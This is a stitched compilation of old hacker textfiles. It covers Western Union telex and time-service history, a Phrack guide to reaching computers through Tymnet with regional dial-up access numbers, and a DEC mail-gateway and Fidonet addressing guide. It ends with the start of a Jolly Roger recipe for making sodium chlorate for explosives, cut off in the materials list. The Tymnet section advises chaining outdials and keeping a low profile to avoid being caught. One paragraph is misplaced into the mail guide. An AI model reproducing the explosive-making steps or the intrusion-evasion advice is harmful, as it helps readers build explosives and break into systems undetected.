"TWX" in favor of "Telex II"; their original device being "Telex I" of course. TWX still uses ten digit dialing with 610 (Canada) or 710/910 (USA) being the leading three digits. Apparently 410-510 have been abandoned; or at least they are used very little, and Bellcore has assigned 510 to the San Francisco area starting in a year or so. 410 still has some funny things on it, like the Western Union "Infomaster," which is a computer that functions like a gateway between Telex, TWX, EasyLink and some other stuff. Today, the Western Union network is but a skeleton of its former self. Now most of their messages are handled on dial up terminals connected to the public phone network. It has been estimated the TWX/Telex business is about fifty percent of what it was a decade ago, if that much. Then there was the Time Service, a neat thing which Western Union offered for over seventy years, until it was discontinued in the middle 1960's. The Time Service provided an important function in the days before alternating current was commonly available. For example, Chicago didn't have AC electricity until about 1945. Prior to that we used DC, or direct current. Well, to run an electric clock, you need 60 cycles AC current for obvious reasons, so prior to the conversion from DC power to AC power, electric wall clocks such as you see in every office were unheard of. How were people to tell the time of day accurately? Enter the Western Union clock. The Western Union, or "telegraph clock" was a spring driven wind up clock, but with a difference. The clocks were "perpetually self-winding," manufactured by the Self-Winding Clock Company of New York City. They had large batteries inside them, known as "telephone cells" which had a life of about ten years each. A mechanical contrivance in the clock would rotate as the clock spring unwound, and once each hour would cause two metal clips to contact for about ten seconds, which would pass juice to the little motor in the clock which in turn re-wound the main spring. The principle was the same as the battery operated clocks we see today. The battery does not actually run the clock -- direct current can't do that -- but it does power the tiny motor which re-winds the spring which actually drives the clock. The Western Union clocks came in various sizes and shapes, ranging from the smallest dials which were nine inches in diameter to the largest which were about eighteen inches in diameter. Some had sweep second hands; others did not. Some had a little red light bulb on the front which would flash. The typical model was about sixteen inches, and was found in offices, schools, transportation depots, radio station offices, and of course in the telegraph office itself. The one thing all the clocks had in common was their brown metal case and cream-colored face, with the insignia "Western Union" and their corporate logo in those days which was a bolt of electricity, sort of like a letter "Z" laying on its side. And in somewhat smaller print below, the words "Naval Observatory Time." The local clocks in an office or school or wherever were calibrated by a "master clock" (actually a sub-master) on the premises. Once an hour on the hour, the (sub) master clock would drop a metal contact for just a half second, and send about nine volts DC up the line to all the local clocks. They in turn had a "tolerance" of about two minutes on both sides of the hour so that the current coming to them would yank the minute hand exactly upright onto the twelve from either direction if the clock was fast or slow. The sub-master clocks in each building were in turn serviced by the master clock in town; usually this was the one in the telegraph office. Every hour on the half hour, the master clock in the telegraph office would throw current to the sub-masters, yanking them into synch as required. And as for the telegraph offices themselves, they were serviced twice a day by -- you guessed it -- the Naval Observatory Master clock in Our Nation's Capitol, by the same routine. Someone there would press half a dozen buttons at the same time, using all available fingers; current would flow to every telegraph office and synch all the master clocks in every community. Western Union charged fifty cents per month for the service, and tossed the clock in for free! Oh yes, there was an installation charge of about two dollars when you first had service (i.e. a clock) installed. The clocks were installed and maintained by the "clockman," a technician from Western Union who spent his day going around hanging new clocks, taking them out of service, changing batteries every few years for each clock, etc. What a panic it was for them when "war time" (what we now call Daylight Savings Time) came around each year! Wally, the guy who serviced all the clocks in downtown Chicago had to start on *Thursday* before the Sunday official changeover just to finish them all by *Tuesday* following. He would literally rush in an office, use his screwdriver to open the case, twirl the hour hand around one hour forward in the spring, (or eleven hours *forward* in the fall since the hands could not be moved backward beyond the twelve going counterclockwise), slam the case back on, screw it in, and move down the hall to the next clock and repeat the process. He could finish several dozen clocks per day, and usually the office assigned him a helper twice a year for these events. He said they never bothered to line the minute hand up just right, because it would have taken too long, and ".....anyway, as long as we got it within a minute or so, it would synch itself the next time the master clock sent a signal..." Working fast, it took a minute to a minute and a half to open the case, twirl the minute hand, put the case back on, "stop and BS with the receptionist for a couple seconds" and move along. The master clock sent its signal over regular telco phone lines. Usually it would terminate in the main office of whatever place it was, and the (sub) master there would take over at that point. Wally said it was very important to do a professional job of hanging the clock to begin with. It had to be level, and the pendulum had to be just right, otherwise the clock would gain or lose more time than could be accommodated in the hourly synching process. He said it was a very rare clock that actually was out by even a minute once an hour, let alone the two minutes of tolerance built into the gear works. "...Sometimes I would come to work on Monday morning, and find out in the office that the clock line had gone open Friday evening. So nobody all weekend got a signal. Usually I would go down a manhole and find it open someplace where one of the Bell guys messed it up, or took it off and never put it back on. To find out where it was open, someone in the office would 'ring out' the line; I'd go around downtown following the loop as we had it laid out, and keep listening on my headset for it. When I found the break or the open, I would tie it down again and the office would release the line; but then I had to go to all the clocks *before* that point and restart them, since the constant current from the office during the search had usually caused them to stop." But he said, time and again, the clocks were usually so well mounted and hung that "...it was rare we would find one so far out of synch that we had to adjust it manually. Usually the first signal to make it through once I repaired the circuit would yank everyone in town to make up for whatever they lost or gained over the weekend..." In 1965, Western Union decided to discontinue the Time Service. In a nostalgic letter to subscribers, they announced their decision to suspend operations at the end of the current month, but said "for old time's sake" anyone who had a clock was welcome to keep it and continue using it; there just would not be any setting signals from the master clocks any longer. Within a day or two of the official announcement, every Western Union clock in the Chicago area headquarters building was gone. The executives snatched them off the wall, and took them home for the day when they would have historical value. All the clocks in the telegraph offices disappeared about the same time, to be replaced with standard office-style electric wall clocks. 128.Phrack Magazine - Vol. 3, Issue 30 by Synthecide There are literally hundreds of systems connected to some of these larger networks, like Tymnet and Telenet. Navigation around these networks is very simple, and usually well explained in their on-line documentation. Furthermore, some systems will actually tell you what is connected and how to get to it. In the case of Tymnet, after dialing in, at the log in prompt, type "information" for the on-line documentation. Accessing systems through networks is as simple as providing an address for it to connect to. The best way to learn about the addresses and how to do things on a network is to read "A Novice's Guide to Hacking (1989 Edition)" which was in Issue 22, File 4 of 12, Volume Two (December 23, 1988). Some points are reiterated here. Once on a network, you provide the NUA (network user address) of the system you wish to connect to. NUAs are strings of 15 digits, broken up in to 3 fields, the NETWORK ADDRESS, the AREA PREFIX, and the DNIC. Each field has 5 digits, and are left padded with 0's where necessary. The DNIC determines which network to take the address from. Tymnet, for example, is 03106. 03110 is Telenet. The AREA PREFIX and NETWORK ADDRESS determine the connection point. By providing the address of the system that you wish to connect to, you will be accessing it through the net... as if you were calling it directly. Obviously, then, this provides one more level of security for access. By connecting to an outdial, you can increase again the level of security you enjoy, by using the outdial in that area to connect to the remote system. Addendum -- Accessing Tymnet Over Local Packet Networks This is just another way to get that extra step and/or bypass other routes. This table is copied from Tymnet's on-line information. As said earlier, it's a great resource, this on-line information! BELL ATLANTIC NODE CITY STATE SPEED ACCESS NUMBER NETWORK 03526 DOVER DELAWARE 300/2400 302/734-9465 @PDN 03526 GEORGETOWN DELAWARE 300/2400 302/856-7055 @PDN 03526 NEWARK DELAWARE 300/2400 302/366-0800 @PDN 03526 WILMINGTON DELAWARE 300/1200 302/428-0030 @PDN 03526 WILMINGTON DELAWARE 2400 302/655-1144 @PDN 06254 WASHINGTON DIST. OF COL. 300/1200 202/479-7214 @PDN 06254 WASHINGTON(MIDTOWN) DIST. OF COL. 2400 202/785-1688 @PDN 06254 WASHINGTON(DOWNTOWN) DIST. OF COL. 300/1200 202/393-6003 @PDN 06254 WASHINGTON(MIDTOWN) DIST. OF COL. 300/1200 202/293-4641 @PDN 06254 WASHINGTON DIST. OF COL. 300/1200 202/546-5549 @PDN 06254 WASHINGTON DIST. OF COL. 300/1200 202/328-0619 @PDN 06254 BETHESDA MARYLAND 300/1200 301/986-9942 @PDN 06254 COLESVILLE MARYLAND 300/2400 301/989-9324 @PDN 06254 HYATTSVILLE MARYLAND 300/1200 301/779-9935 @PDN 06254 LAUREL MARYLAND 300/2400 301/490-9971 @PDN 06254 ROCKVILLE MARYLAND 300/1200 301/340-9903 @PDN 06254 SILVER SPRING MARYLAND 300/1200 301/495-9911 @PDN 07771 BERNARDSVILLE NEW JERSEY 300/2400 201/766-7138 @PDN 07771 CLINTON NEW JERSEY 300-1200 201/730-8693 @PDN 07771 DOVER NEW JERSEY 300/2400 201/361-9211 @PDN 07771 EATONTOWN/RED BANK NEW JERSEY 300/2400 201/758-8000 @PDN 07771 ELIZABETH NEW JERSEY 300/2400 201/289-5100 @PDN 07771 ENGLEWOOD NEW JERSEY 300/2400 201/871-3000 @PDN 07771 FREEHOLD NEW JERSEY 300/2400 201/780-8890 @PDN 07771 HACKENSACK NEW JERSEY 300/2400 201/343-9200 @PDN 07771 JERSEY CITY NEW JERSEY 300/2400 201/659-3800 @PDN 07771 LIVINGSTON NEW JERSEY 300/2400 201/533-0561 @PDN 07771 LONG BRANCH/RED BANK NEW JERSEY 300/2400 201/758-8000 @PDN 07771 MADISON NEW JERSEY 300/2400 201/593-0004 @PDN 07771 METUCHEN NEW JERSEY 300/2400 201/906-9500 @PDN 07771 MIDDLETOWN NEW JERSEY 300/2400 201/957-9000 @PDN 07771 MORRISTOWN NEW JERSEY 300/2400 201/455-0437 @PDN 07771 NEWARK NEW JERSEY 300/2400 201/623-0083 @PDN 07771 NEW BRUNSWICK NEW JERSEY 300/2400 201/247-2700 @PDN 07771 NEW FOUNDLAND NEW JERSEY 300/2400 201/697-9380 @PDN 07771 PASSAIC NEW JERSEY 300/2400 201/473-6200 @PDN 07771 PATERSON NEW JERSEY 300/2400 201/345-7700 @PDN 07771 PHILLIPSBURG NEW JERSEY 300/2400 201/454-9270 @PDN 07771 POMPTON LAKES NEW JERSEY 300/2400 201/835-8400 @PDN 07771 RED BANK NEW JERSEY 300/2400 201/758-8000 @PDN 07771 RIDGEWOOD NEW JERSEY 300/2400 201/445-4800 @PDN 07771 SOMERVILLE NEW JERSEY 300/2400 201/218-1200 @PDN 07771 SOUTH RIVER NEW JERSEY 300/2400 201/390-9100 @PDN 07771 SPRING LAKE NEW JERSEY 300/2400 201/974-0850 @PDN 07771 TOMS RIVER NEW JERSEY 300/2400 201/286-3800 @PDN 07771 WASHINGTON NEW JERSEY 300/2400 201/689-6894 @PDN 07771 WAYNE/PATERSON NEW JERSEY 300/2400 201/345-7700 @PDN 03526 ALLENTOWN PENNSYLVANIA 300/1200 215/435-0266 @PDN 11301 ALTOONA PENNSYLVANIA 300/1200 814/946-8639 @PDN 11301 ALTOONA PENNSYLVANIA 2400 814/949-0505 @PDN 03526 AMBLER PENNSYLVANIA 300/1200 215/283-2170 @PDN 10672 AMBRIDGE PENNSYLVANIA 300/1200 412/266-9610 @PDN 10672 CARNEGIE PENNSYLVANIA 300/1200 412/276-1882 @PDN 10672 CHARLEROI PENNSYLVANIA 300/1200 412/483-9100 @PDN 03526 CHESTER HEIGHTS PENNSYLVANIA 300/1200 215/358-0820 @PDN 03526 COATESVILLE PENNSYLVANIA 300/1200 215/383-7212 @PDN 10672 CONNELLSVILLE PENNSYLVANIA 300/1200 412/628-7560 @PDN 03526 DOWNINGTON/COATES. PENNSYLVANIA 300/1200 215/383-7212 @PDN 03562 DOYLESTOWN PENNSYLVANIA 300/1200 215/340-0052 @PDN 03562 GERMANTOWN PENNSYLVANIA 300/1200 215-843-4075 @PDN 10672 GLENSHAW PENNSYLVANIA 300/1200 412/487-6868 @PDN 10672 GREENSBURG PENNSYLVANIA 300/1200 412/836-7840 @PDN 11301 HARRISBURG PENNSYLVANIA 300/1200 717/236-3274 @PDN 11301 HARRISBURG PENNSYLVANIA 2400 717/238-0450 @PDN 10672 INDIANA PENNSYLVANIA 300/1200 412/465-7210 @PDN 03526 KING OF PRUSSIA PENNSYLVANIA 300/1200 215/270-2970 @PDN 03526 KIRKLYN PENNSYLVANIA 300/1200 215/789-5650 @PDN 03526 LANSDOWNE PENNSYLVANIA 300/1200 215/626-9001 @PDN 10672 LATROBE PENNSYLVANIA 300/1200 412/537-0340 @PDN 11301 LEMOYNE/HARRISBURG PENNSYLVANIA 300/1200 717/236-3274 @PDN 10672 MCKEESPORT PENNSYLVANIA 300/1200 412/673-6200 @PDN 10672 NEW CASTLE PENNSYLVANIA 300/1200 412/658-5982 @PDN 10672 NEW KENSINGTON PENNSYLVANIA 300/1200 412/337-0510 @PDN 03526 NORRISTOWN PENNSYLVANIA 300/1200 215/270-2970 @PDN 03526 PAOLI PENNSYLVANIA 300/1200 215/648-0010 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/923-7792 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/557-0659 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/545-7886 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/677-0321 @PDN 03562 PHILADELPHIA PENNSYLVANIA 2400 215/625-0770 @PDN 10672 PITTSBURGH PENNSYLVANIA 300/1200 412/281-8950 @PDN 10672 PITTSBURGH PENNSYLVANIA 300/1200 412-687-4131 @PDN 10672 PITTSBURGH PENNSYLVANIA 2400 412/261-9732 @PDN 10672 POTTSTOWN PENNSYLVANIA 300/1200 215/327-8032 @PDN 03526 QUAKERTOWN PENNSYLVANIA 300/1200 215/538-7032 @PDN 03526 READING PENNSYLVANIA 300/1200 215/375-7570 @PDN 10672 ROCHESTER PENNSYLVANIA 300/1200 412/728-9770 @PDN 03526 SCRANTON PENNSYLVANIA 300/1200 717/348-1123 @PDN 03526 SCRANTON PENNSYLVANIA 2400 717/341-1860 @PDN 10672 SHARON PENNSYLVANIA 300/1200 412/342-1681 @PDN 03526 TULLYTOWN PENNSYLVANIA 300/1200 215/547-3300 @PDN 10672 UNIONTOWN PENNSYLVANIA 300/1200 412/437-5640 @PDN 03562 VALLEY FORGE PENNSYLVANIA 300/1200 215/270-2970 @PDN 10672 WASHINGTON PENNSYLVANIA 300/1200 412/223-9090 @PDN 03526 WAYNE PENNSYLVANIA 300/1200 215/341-9605 @PDN 10672 WILKINSBURG PENNSYLVANIA 300/1200 412/241-1006 @PDN 06254 ALEXANDRIA VIRGINIA 300/1200 703/683-6710 @PDN 06254 ARLINGTON VIRGINIA 300/1200 703/524-8961 @PDN 06254 FAIRFAX VIRGINIA 300/1200 703/385-1343 @PDN 06254 MCLEAN VIRGINIA 300/1200 703/848-2941 @PDN @PDN BELL ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PDN) (CONNECT MESSAGE) . _. _. _< _C _R _> _ (SYNCHRONIZES DATA SPEEDS) WELCOME TO THE BPA/DST PDN *. _T _ _< _C _R _> _ (TYMNET ADDRESS) 131069 (ADDRESS CONFIRMATION - TYMNET DNIC) COM (CONFIRMATION OF CALL SET-UP) -GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES) BELL SOUTH NODE CITY STATE DENSITY ACCESS NUMBER MODEM 10207 ATLANTA GEORGIA 300/1200 404/261-4633 @PLSK 10207 ATHENS GEORGIA 300/1200 404/354-0614 @PLSK 10207 COLUMBUS GEORGIA 300/1200 404/324-5771 @PLSK 10207 ROME GEORGIA 300/1200 404/234/7542 @PLSK @PLSK BELLSOUTH - NETWORK NAME IS PULSELINK (CONNECT MESSAGE) . _. _. _ _< _C _R _> _ (SYNCHRONIZES DATA SPEEDS) (DOES NOT ECHO TO THE TERMINAL) CONNECTED PULSELINK 1 _3 _1 _0 _6 _ (TYMNET ADDRESS) (DOES NOT ECHO TO THE TERMINAL) PULSELINK: CALL CONNECTED TO 1 3106 -GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES) PACIFIC BELL NODE CITY STATE DENSITY ACCESS NUMBER NETWORK 03306 BERKELEY CALIFORNIA 300/1200 415-548-2121 @PPS 06272 EL SEGUNDO CALIFORNIA 300/1200 213-640-8548 @PPS 06272 FULLERTON CALIFORNIA 300/1200 714-441-2777 @PPS 06272 INGLEWOOD CALIFORNIA 300/1200 213-216-7667 @PPS 06272 ANGELES(DOWNTOWN) CALIFORNIA 300/1200 213-687-3727 @PPS 06272 LOS ANGELES CALIFORNIA 300/1200 213-480-1677 @PPS 03306 MOUNTAIN VIEW CALIFORNIA 300/1200 415-960-3363 @PPS 03306 OAKLAND CALIFORNIA 300/1200 415-893-9889 @PPS 03306 PALO ALTO CALIFORNIA 300/1200 415-325-4666 @PPS 06272 PASADENA CALIFORNIA 300/1200 818-356-0780 @PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-543-8275 @PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-626-5380 @PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-362-2280 @PPS 03306 SAN JOSE CALIFORNIA 300/1200 408-920-0888 @PPS 06272 SANTA ANNA CALIFORNIA 300/1200 714-972-9844 @PPS 06272 VAN NUYS CALIFORNIA 300/1200 818-780-1066 @PPS @PPS PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS) (CONNECT MESSAGE) . _. _. _< _C _R _ (SYNCHRONIZES DATA SPEEDS) (DOES NOT ECHO TO THE TERMINAL) ONLINE 1200 WELCOME TO PPS: 415-XXX-XXXX 1 _3 _1 _0 _6 _9 _ (TYMNET ADDRESS) (DOES NOT ECHO UNTIL TYMNET RESPONDS) -GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES) SOUTHERN NEW ENGLAND NODE CITY STATE DENSITY ACCESS NUMBERS NETWORK 02727 BRIDGEPORT CONNECTICUT 300/2400 203/366-6972 @CONNNET 02727 BRISTOL CONNECTICUT 300/2400 203/589-5100 @CONNNET 02727 CANAAN CONNECTICUT 300/2400 203/824-5103 @CONNNET 02727 CLINTON CONNECTICUT 300/2400 203/669-4243 @CONNNET 02727 DANBURY CONNECTICUT 300/2400 203/743-2906 @CONNNET 02727 DANIELSON CONNECTICUT 300/2400 203/779-1880 @CONNNET 02727 HARTFORD/MIDDLETOWN CONNECTICUT 300/2400 203/724-6219 @CONNNET 02727 MERIDEN CONNECTICUT 300/2400 203/237-3460 @CONNNET 02727 NEW HAVEN CONNECTICUT 300/2400 203/776-1142 @CONNNET 02727 NEW LONDON CONNECTICUT 300/2400 203/443-0884 @CONNNET 02727 NEW MILFORD CONNECTICUT 300/2400 203/355-0764 @CONNNET 02727 NORWALK CONNECTICUT 300/2400 203/866-5305 @CONNNET 02727 OLD GREDDWICH CONNNETICUT 300/2400 203/637-8872 @CONNNET 02727 OLD SAYBROOK CONNECTICUT 300/2400 203/388-0778 @CONNNET 02727 SEYMOUR CONNECTICUT 300/2400 203/881-1455 @CONNNET 02727 STAMFORD CONNECTICUT 300/2400 203/324-9701 @CONNNET 02727 STORRS CONNECTICUT 300/2400 203/429-4243 @CONNNET 02727 TORRINGTON CONNECTICUT 300/2400 203/482-9849 @CONNNET 02727 WATERBURY CONNECTICUT 300/2400 203/597-0064 @CONNNET 02727 WILLIMANTIC CONNECTICUT 300/2400 203/456-4552 @CONNNET 02727 WINDSOR CONNECTICUT 300/2400 203/688-9330 @CONNNET 02727 WINDSOR LCKS/ENFIELD CONNECTICUT 300/2400 203/623-9804 @CONNNET @CONNNET - SOUTHERN NEW ENGLAND TELEPHONE - NETWORK NAME IN CONNNET (CONNECT MESSAGE) H_ H_ <_ C_ R_> (SYNCHRONIZES DATA SPEEDS) (DOES NOT ECHO TO THE TERMINAL) CONNNET ._ T_ <_ C_ R_>_ (MUST BE CAPITAL LETTERS) 26-SEP-88 18:33 (DATA) 031069 (ADDRESS CONFIRMATION) COM (CONFIRMATION OF CALL SET-UP) -GWY OXXXX-TYMNET: PLEASE LOG IN: SOUTHWESTERN BELL NODE CITY STATE DENSITY ACCESS NUMBERS NETWORK 05443 KANSAS CITY KANSAS 300/1200 316/225-9951 @MRLK 05443 HAYS KANSAS 300/1200 913/625-8100 @MRLK 05443 HUTCHINSON KANSAS 300/1200 316/669-1052 @MRLK 05443 LAWRENCE KANSAS 300/1200 913/841-5580 @MRLK 05443 MANHATTAN KANSAS 300/1200 913/539-9291 @MRLK 05443 PARSONS KANSAS 300/1200 316/421-0620 @MRLK 05443 SALINA KANSAS 300/1200 913/825-4547 @MRLK 05443 TOPEKA KANSAS 300/1200 913/235-1909 @MRLK 05443 WICHITA KANSAS 300/1200 316/269-1996 @MRLK 04766 BRIDGETON/ST. LOUIS MISSOURI 300/1200 314/622-0900 @MRLK 04766 ST. LOUIS MISSOURI 300/1200 314/622-0900 @MRLK On a side note, the recent book The Cuckoo's Egg provides some interesting information (in the form of a story, however) on a Tymnet hacker. Remember that he was into BIG things, and hence he was cracked down upon. If you keep a low profile, networks should provide a good access method. If you can find a system that is connected to the Internet that you can get on from Tymnet, you are doing well. 129.Phrack Magazine - Vol. 3, Issue 30 by Dedicated Link INTRODUCTION DECWRL is a mail gateway computer operated by Digital's Western Research Laboratory in Palo Alto, California. Its purpose is to support the interchange of electronic mail between Digital and the "outside world." DECWRL is connected to Digital's Easynet, and also to a number of different outside electronic mail networks. Digital users can send outside mail by sending to DECWRL::"outside-address", and digital users can also receive mail by having your correspondents route it through DECWRL. The details of incoming mail are more complex, and are discussed below. It is vitally important that Digital employees be good citizens of the networks to which we are connected. They depend on the integrity of our user community to ensure that tighter controls over the use of the gateway are not required. The most important rule is "no chain letters," but there are other rules depending on whether the connected network that you are using is commercial or non-commercial. The current traffic volume (September 1989) is about 10,000 mail messages per day and about 3,000 USENET messages per day. Gatewayed mail traffic has doubled every year since 1983. DECWRL is currently a Vax 8530 computer with 48 megabytes of main memory, 2500 megabytes of disk space, 8 9600-baud (Telebit) modem ports, and various network connections. They will shortly be upgrading to a Vax 8650 system. They run Ultrix 3.0 as the base operating system. ADMINISTRATION The gateway has engineering staff, but no administrative or clerical staff. They work hard to keep it running, but they do not have the resources to answer telephone queries or provide tutorials in its use. They post periodic status reports to the USENET newsgroup dec.general. Various helpful people usually copy these reports to the VAXNOTES "gateways" conference within a day or two. HOW TO SEND MAIL DECWRL is connected to quite a number of different mail networks. If you were logged on directly to it, you could type addresses directly, e.g. To: strange!foreign!address. But since you are not logged on directly to the gateway, you must send mail so that when it arrives at the gateway, it will be sent as if that address had been typed locally. * Sending from VMS If you are a VMS user, you should use NMAIL, because VMS mail does not know how to requeue and retry mail when the network is congested or disconnected. From VMS, address your mail like this: To: nm%DECWRL::"strange!foreign!address" The quote characters (") are important, to make sure that VMS doesn't try to interpret strange!foreign!address itself. If you are typing such an address inside a mail program, it will work as advertised. If you are using DCL and typing directly to the command line, you should beware that DCL likes to remove quotes, so you will have to enclose the entire address in quotes, and then put two quotes in every place that one quote should appear in the address: $ mail test.msg "nm%DECWRL::""foreign!addr""" /subj="hello" Note the three quotes in a row after foreign!addr. The first two of them are doubled to produce a single quote in the address, and the third ends the address itself (balancing the quote in front of the nm%). Here are some typical outgoing mail addresses as used from a VMS system: To: nm%DECWRL::"lll-winkin!netsys!phrack" To: nm%DECWRL::"postmaster@msp.pnet.sc.edu" To: nm%DECWRL::"netsys!phrack@uunet.uu.net" To: nm%DECWRL::"phrackserv@CUNYVM.bitnet" To: nm%DECWRL::"Chris.Jones@f654.n987.z1.fidonet.org" * Sending from Ultrix If your Ultrix system has been configured for it, then you can, from your Ultrix system, just send directly to the foreign address, and the mail software will take care of all of the gateway routing for you. Most Ultrix systems in Corporate Research and in the Palo Alto cluster are configured this way. To find out whether your Ultrix system has been so configured, just try it and see what happens. If it doesn't work, you will receive notification almost instantly. NOTE: The Ultrix mail system is extremely flexible; it is almost completely configurable by the customer. While this is valuable to customers, it makes it very difficult to write global instructions for the use of Ultrix mailers, because it is possible that the local changes have produced something quite unlike the vendor-delivered mailer. One of the popular changes is to tinker with the meaning of quote characters (") in Ultrix addresses. Some systems consider that these two addresses are the same: site1!site2!user@host.dec.com and "site1!site2!user"@host.dec.com while others are configured so that one form will work and the other will not. All of these examples use the quotes. If you have trouble getting the examples to work, please try them again without the quotes. Perhaps your Ultrix system is interpreting the quotes differently. If your Ultrix system has an IP link to Palo Alto (type "/etc/ping decwrl.dec.com" to find out if it does), then you can route your mail to the gateway via IP. This has the advantage that your Ultrix mail headers will reach the gateway directly, instead of being translated into DECNET mail headers and then back into Ultrix at the other end. Do this as follows: To: "alien!address"@decwrl.dec.com The quotes are necessary only if the alien address contains a ! character, but they don't hurt if you use them unnecessarily. If the alien address contains an "@" character, you will need to change it into a "%" character. For example, to send via IP to joe@widget.org, you should address the mail. To: "joe%widget.org"@decwrl.dec.com If your Ultrix system has only a DECNET link to Palo Alto, then you should address mail in much the same way that VMS users do, save that you should not put the nm% in front of the address: To: DECWRL::"strange!foreign!address" Here are some typical outgoing mail addresses as used from an Ultrix system that has IP access. Ultrix systems without IP access should use the same syntax as VMS users, except that the nm% at the front of the address should not be used. To: "lll-winken!netsys!phrack"@decwrl.dec.com To: "postmaster%msp.pnet.sc.edu"@decwrl.dec.com To: "phrackserv%CUNYVM.bitnet"@decwrl.dec.com To: "netsys!phrack%uunet.uu.net"@decwrl.dec.com To: "Chris.Jones@f654.n987.z1.fidonet.org"@decwrl.dec.com DETAILS OF USING OTHER NETWORKS All of the world's computer networks are connected together, more or less, so it is hard to draw exact boundaries between them. Precisely where the internet ends and UUCP begins is a matter of interpretation. For purposes of sending mail, though, it is convenient to divide the network universe into these categories: Easynet: Digital's internal DECNET network. Characterized by addresses of the form NODE::USER. Easynet can be used for commercial purposes. Internet: A collection of networks including the old ARPAnet, the NSFnet, the CSnet, and others. Most international research, development, and educational organizations are connected in some fashion to the Internet. Characterized by addresses of the form user@site.subdomain.domain. The internet itself cannot be used for commercial purposes. UUCP: A very primitive network with no management, built with auto-dialers phoning one computer from another. Characterized by addresses of the form place1!place2!user. The UUCP network can be used for commercial purposes provided that none of the sites through which the message is routed objects to that. USENET: Not a network at all, but a layer of software built on top of UUCP and Internet. BITNET: An IBM-based network linking primarily educational sites. Digital users can send to BITNET as if it were part of internet, but BITNET users need special instructions for reversing the process. BITNET cannot be used for commercial purposes. Fidonet: A network of personal computers. I am unsure of the status of using Fidonet for commercial purposes, nor am I sure of its efficacy. DOMAINS AND DOMAIN ADDRESSING There is a particular network called "the Internet;" it is somewhat related to what used to be "the ARPAnet." The Internet style of addressing is flexible enough that people use it for addressing other networks as well, with the result that it is quite difficult to look at an address and tell just what network it is likely to traverse. But the phrase "Internet address" does not mean "mail address of some computer on the Internet" but rather "mail address in the style used by the Internet." Terminology is even further confused because the word "address" means one thing to people who build networks and something entirely different to people who use them. In this file an "address" is something like "mike@decwrl.dec.com" and not "192.1.24.177" (which is what network engineers would call an "internet address"). The Internet naming scheme uses hierarchical domains, which despite their title are just a bookkeeping trick. It doesn't really matter whether you say NODE: :USER or USER@NODE, but what happens when you connect two companies' networks together and they both have a node ANCHOR?? You must, somehow, specify which ANCHOR you mean. You could say ANCHOR.DEC::USER or DEC.ANCHOR::USER or USER@ANCHOR.DEC or USER@DEC.ANCHOR. The Internet convention is to say USER@ANCHOR.DEC, with the owner (DEC) after the name (ANCHOR). But there could be several different organizations named DEC. You could have Digital Equipment Corporation or Down East College or Disabled Education Committee. The technique that the Internet scheme uses to resolve conflicts like this is to have hierarchical domains. A normal domain isn't DEC or STANFORD, but DEC.COM (commercial) and STANFORD.EDU (educational). These domains can be further divided into ZK3.DEC.COM or CS.STANFORD.EDU. This doesn't resolve conflicts completely, though: both Central Michigan University and Carnegie-Mellon University could claim to be CMU.EDU. The rule is that the owner of the EDU domain gets to decide, just as the owner of the CMU.EDU gets to decide whether the Electrical Engineering department or the Elementary Education department gets subdomain EE.CMU.EDU. The domain scheme, while not perfect, is completely extensible. If you have two addresses that can potentially conflict, you can suffix some domain to the end of them, thereby making, say, decwrl.UUCP be somehow different from DECWRL.ENET. DECWRL's entire mail system is organized according to Internet domains, and in fact we handle all mail internally as if it were Internet mail. Incoming mail is converted into Internet mail, and then routed to the appropriate domain; if that domain requires some conversion, then the mail is converted to the requirements of the outbound domain as it passes through the gateway. For example, they put Easynet mail into the domain ENE. On a side note, the recent book The Cuckoo's Egg provides some interesting information (in the form of a story, however) on a Tymnet hacker. Remember that he was into BIG things, and hence he was cracked down upon. If you keep a low profile, networks should provide a good access method. If you can find a system that is connected to the Internet that you can get on from Tymnet, you are doing well. Username@f.n.z.ifna.org In other words, if I wanted to mail to Silicon Swindler at 1:135/5, the address would be Silicon_Swindler@f5.n135.z1.ifna.org and, provided that your mailer knows the .ifna.org domain, it should get through alright. Apparently, as of the writing of this article, they have implemented a new gateway name called fidonet.org which should work in place of ifna.org in all routings. If your mailer does not know either of these domains, use the above routing but replace the first "@" with a "%" and then afterwards, use either of the following mailers after the "@": CS.ORST.EDU or K9.CS.ORST.EDU (i.e. username%f.n.z.fidonet.org@CS.ORST.EDU [or replace CS.ORST.EDU with K9.CS.ORST.EDU]). The following is a list compiled by Bill Fenner (WCF@PSUECL.BITNET) that was posted on INFONETS DIGEST which lists a number of FIDONET gateways: Net Node Node Name 104 56 milehi.ifna.org 105 55 casper.ifna.org 107 320 rubbs.ifna.org 109 661 blkcat.ifna.org 125 406 fidogate.ifna.org 128 19 hipshk.ifna.org 129 65 insight.ifna.org 143 N/A fidogate.ifna.org 152 200 castle.ifna.org 161 N/A fidogate.ifna.org 369 17 megasys.ifna.org NOTE: The UUCP equivalent node name is the first part of the node name. In other words, the UUCP node milehi is listed as milehi.ifna.org but can be mailed directly over the UUCP network. Another way to mail to FIDONET, specifically for Internet people, is in this format: ihnp4!necntc!ncoast!ohiont!!!user_name@husc6.harvard.edu And for those UUCP mailing people out there, just use the path described and ignore the @husc5.harvard.edu portion. There is a FIDONET NODELIST available on most any FIDONET bulletin board, but it is quite large. ONTYME Previously known as Tymnet, OnTyme is the McDonnell Douglas revision. After they bought out Tymnet, they renamed the company and opened an experimental Internet gateway at ONTYME.TYMNET.COM but this is supposedly only good for certain corporate addresses within McDonnell Douglas and Tymnet, not their customers. The userid format is xx.yyy or xx.y/yy where xx is a net name and yyy (or y/yy) is a true username. If you cannot directly nail this, try: xx.yyy%ONTYME.TYM 130.Sodium Chlorate by the Jolly Roger Sodium Chlorate is a strong oxidizer used in the manufacture of explosives. It can be used in place of Potassium Chlorate. Material Required: · 2 carbon or lead rods (1 in. diameter by 5 in. long) · Salt, or ocean water · Sulfuric acid, diluted · Motor Vehicle · Water · 2 wires, 16 gauge (3/64 in. diameter approx.), 6 